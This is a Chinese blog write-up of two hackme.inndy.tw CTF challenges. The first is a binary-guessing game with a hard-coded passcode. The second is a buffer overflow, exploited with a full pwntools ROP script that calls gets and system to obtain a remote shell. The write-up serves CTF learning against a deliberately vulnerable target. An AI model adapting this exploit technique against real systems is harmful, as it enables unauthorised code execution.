toooomuch和toooomuch2的wp

最新推荐文章于 2020-09-22 14:45:33 发布
最新推荐文章于 2020-09-22 14:45:33 发布
阅读量3.4k 收藏
点赞数
分类专栏: ctf的wp 文章标签: wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/niexinming/article/details/78796408
版权

https://hackme.inndy.tw/scoreboard/ 题目很有趣,我做了toooomuch这个题目感觉还不错,我把wp分享出来,方便大家学习
toooomuch的题目要求是: 

nc hackme.inndy.tw 7702

Can you pass the game?

这个题目是一个二分猜测题目,很简单,passcode是硬编码在binary里面的
image
toooomuch-2的题目要求是: 

nc hackme.inndy.tw 7702

Get a shell, please.
Tips: Buffer overflow, 0x8048560, shellcode

toooomuch的main函数:
image
toooomuch函数:
image
可以看到输入的数据没有任何限制的从gets进入到strcpy中,这里就造成了缓冲区溢出漏洞
再看看程序开启了哪些保护:
image
可以看到程序没有开任何保护
这个题目可以通过溢出调用gets函数,把/bin/sh写入bss段,然后再利用pop_ret把gets的参数弹出,然后再调用system函数,把bss段的中的/bin/sh传入就可以了 

#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'niexinming'

from pwn import *
context(terminal = ['gnome-terminal', '-x', 'sh', '-c'], arch = 'i386', os = 'linux', log_level = 'debug')

def debug(addr = '0x080487D7'):
    raw_input('debug:')
    gdb.attach(io, "b *" + addr)

shellcode="/bin/sh\0"

elf = ELF('/home/h11p/hackme/toooomuch2')
exec_system=elf.plt['system']
print "%x" % exec_system
gets_addr = elf.symbols['gets']
print "%x" % gets_addr
bss_addr = elf.bss()
print "%x" % bss_addr
offset = 28

#io = process('/home/h11p/hackme/toooomuch2')

io = remote('hackme.inndy.tw', 7702)
pop_ret=0x0804889b  #pop_ret
system_addr= 0x08048649

payload = 'A' * offset
payload += p32(gets_addr)
payload +=p32(pop_ret)
payload += p32(bss_addr)

payload += p32(system_addr)
payload += p32(bss_addr)
payload += p32(0)

#debug()
io.sendline(payload)
io.sendline(shellcode)

io.interactive()

io.close()

效果:
image

niexinming
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
【Pwn】NCTF2019 easy_rop
Nothing
12-03 1092
查看程序保护。 分析程序,程序只有一个main函数。 v6距离rbp为0x70,在输入数字的时候可以输34 * 4个字节的数,34*4-0x70=24,意味着可以溢出覆盖rbp,ret_address,以及返回地址下面的8个字节。main函数的old_rbp值实际上是代码段init的地址,返回地址位置是libc中的一个地址。scanf函数%d当输入为’+'时不会改变原内存中数据,于是可以来泄露代...
hackme pwn toomuch2 [buffer overflow + ROPx86]
ACdream
01-27 353
checksec一下,发现啥保护也没有,不需要再找libc的版本了 这里的漏洞点在toomuch1中说过了 在toooomuch函数中,覆盖0x18+4个值,即可达到溢出效果 下一步目标是:将"/bin/sh"写入bss段中,然后执行system函数即可 类似x64平台,在x86中也有相似的通用gadgets exp1: 利用gets+system: #!/usr/bi...
hackme pwn toomuch1 - buffer overflow
ACdream
01-23 308
一开始看到这个漏洞还是蛮明显的~ 这里s的长度只有0x18个字节,然后用的是gets和strcpy来输入和传递,意味着没有长度限制与安全检查,所以可以直接缓冲区溢出来覆盖函数返回地址 返回地址在ebp + 4,这里是ebp - 18 中间的填充值也就好算了~和homework一样,这里有现成的函数重用 代码如下: #!/usr/bin/env python # coding=utf...
hackme pwn toomuch1 - 二分法解题
ACdream
01-23 236
分析函数流程: 首先是密码正确性判断,然后是玩游戏~ 第一关:43210 典型的二分法猜数字:0~100的区间,有8次机会! 2^8=256>100,次数足够了 第一次猜50,大了就说明数字在0~49中,则猜25;小了就说明数字在51~99中,则猜75;最后得到结果,即得到fake_flag (fake_flag是这个题的第一关) 截图如下: 这里运气比较好,...
hackme.inndy.tw的rop题目
10-15
hackme.inndy.tw的rop题目,如果那个网站被墙或者关闭的话可以从这里下载
wp2pcs百度网盘
01-10
wP2PCS把你的WordPress和百度个人云存储(百度网盘)联系在一起,将百度网盘作为你的网站后备箱,你可以将WordPress备份到百度云,可以把图片放在百度云,可以利用百度云为你的网站提供下载,利用云存储随时随地同步...
wp2 密码包
01-09
wp2 密码包
bugku ctf misc wp2.pdf
07-05
bugku ctf misc wp2.pdf
WP2-ctfshow
最新发布
02-24
2
WP2PDF-开源
05-15
WP2PDF是一个脚本,可将Blog-Software WordPress的一个或多个条目的内容转换为PDF。 它基于FPDF(一个免费的PDF库,用PHP编写)。 它需要可正常运行的WordPress安装和PHP4.x。
hackme inndy pwn stack writeup
charlie_heng的专栏
01-02 477
这题看起来很恐怖,所有保护都开了,但是其实并没有想象中难 这题先pop 两次,再push回去一个,然后再push下标,就可以直接绕过canary,把ret的地址给leak出来 再减去libc里面的__libc_start_main偏移,再把低三位给清零就得到libc基址 之后就是常规rop了,这里直接执行system(‘/bin/sh’) 下面就是利用的代码 from pwn imp...
基于公开网站挖掘敏感信息的研究与分析- Fofa 搜索
热门推荐
ploto_cs的博客
09-22 7万+
基于公开公开网站挖掘敏感信息的研究与分析- Fofa 搜索 一.引言 1.1项目概述 基于公开网站的敏感信息挖掘研究与分析:针对目前网络安全整体的趋势我们从google等搜索引擎、Github等代码库、FOFA等空间搜索这三个方面进行研究与分析,基于公开网站挖掘敏感信息,研究其中的各项技术,实现了敏感信息的定义及敏感信息挖掘方法。 1.2 需求分析 随着互联网的快速发展,网络中的信息呈现出爆炸型增长。然而由于网络应用程序本身的缺陷加上管理上的疏忽,越来越多的敏感信息暴露于公共网络之上,个人隐私、站点结构等敏
绿盟杯NSCTF(CCTF)2017 pwn writeup
jmp esp
07-22 6013
前言比赛有无数值得吐槽的地方,其中最主要的是,题目给了pwn的libc,然而,特么是错的,也就是说虽然给了libc,但是其实还是靠运气/当做没有libc解,顺手记录一下这两个水题。pwn1分析mainint __cdecl main() { alarm(0x1u); setbuf(stdin, 0); setbuf(stdout, 0); setbuf(stderr, 0); p
very_overflow的wp
一个码农的笔记
12-05 440
https://hackme.inndy.tw/scoreboard/ 题目很有趣,我做了very_overflow这个题目感觉还不错,我把wp分享出来,方便大家学习 very_overflow的题目要求是: nc hackme.inndy.tw 7705Source Code: https://hackme.inndy.tw/static/very_overflow.c程序的源码给了,这个程
error: fatal: unable to access 'https://github.com/openshift/cakephp-ex.git/': Could not resolve ho
04-15 1980
System EnvironmentRun as root.Currently OpenShift v3 must be started as root in order to manipulate your iptables configuration. The openshift commands (e.g. oc create) do not need to be run as root.P...
Ret2Libc(2) (有system、无‘/bin/sh’)绕过NX、ASLR
X丶 的博客
11-21 2211
和Ret2Libc(1)一样,先把程序扔进IDA看看代码    和Ret2Libc(1)一样,gets存在溢出漏洞 gdb-peda$ checksec CANARY    : disabled FORTIFY   : disabled NX        : ENABLED PIE       : disabled RELRO     : Partial 可以看到程序开启了NX, 我的...
hackme inndy pwn leave_msg writeup
charlie_heng的专栏
01-01 400
感觉有点做题做上瘾了。。。。。 拿到程序,首先checksec看下开了什么保护,发现没开nx,但是开了栈溢出检测,然后又有堆,明显是把shellcode放堆里面去执行 然后看了下,下标检查那里可以加个空格绕过,可以修改got表里面的函数为堆的值,调用函数的时候就会执行堆里面的shellcode 但是这里有一个长度判断,大于8就会截断,放不了一般的shellcode 这里绕过就比较骚了,首先...
cmdParse.c源码
ScilogyHunter的博客
02-21 375
/********************************************************************************************************* ** 文件: cmdParse.c ** 作者: scilogyhunter ** 站点: https://me.csdn.net/ScilogyHunter ** 描述: 通用命令行参...
E2PROM的WP是什么意思
09-06
E2PROM的WP是写保护位(Write Protect)的缩写。他是一个控制引脚,通常用于保护E2PROM的写入操作免受不希望的修改。当WP引脚被拉低时,E2PROM的写入操作会被禁用,从而防止对存储的数据进行修改。通过使用写保护位,可以确保存储在E2PROM中的数据的完整性和安全性。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [蓝桥杯之单片机设计与开发(16)——E2PROM](https://blog.csdn.net/Xiaomo_haa/article/details/87918394)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值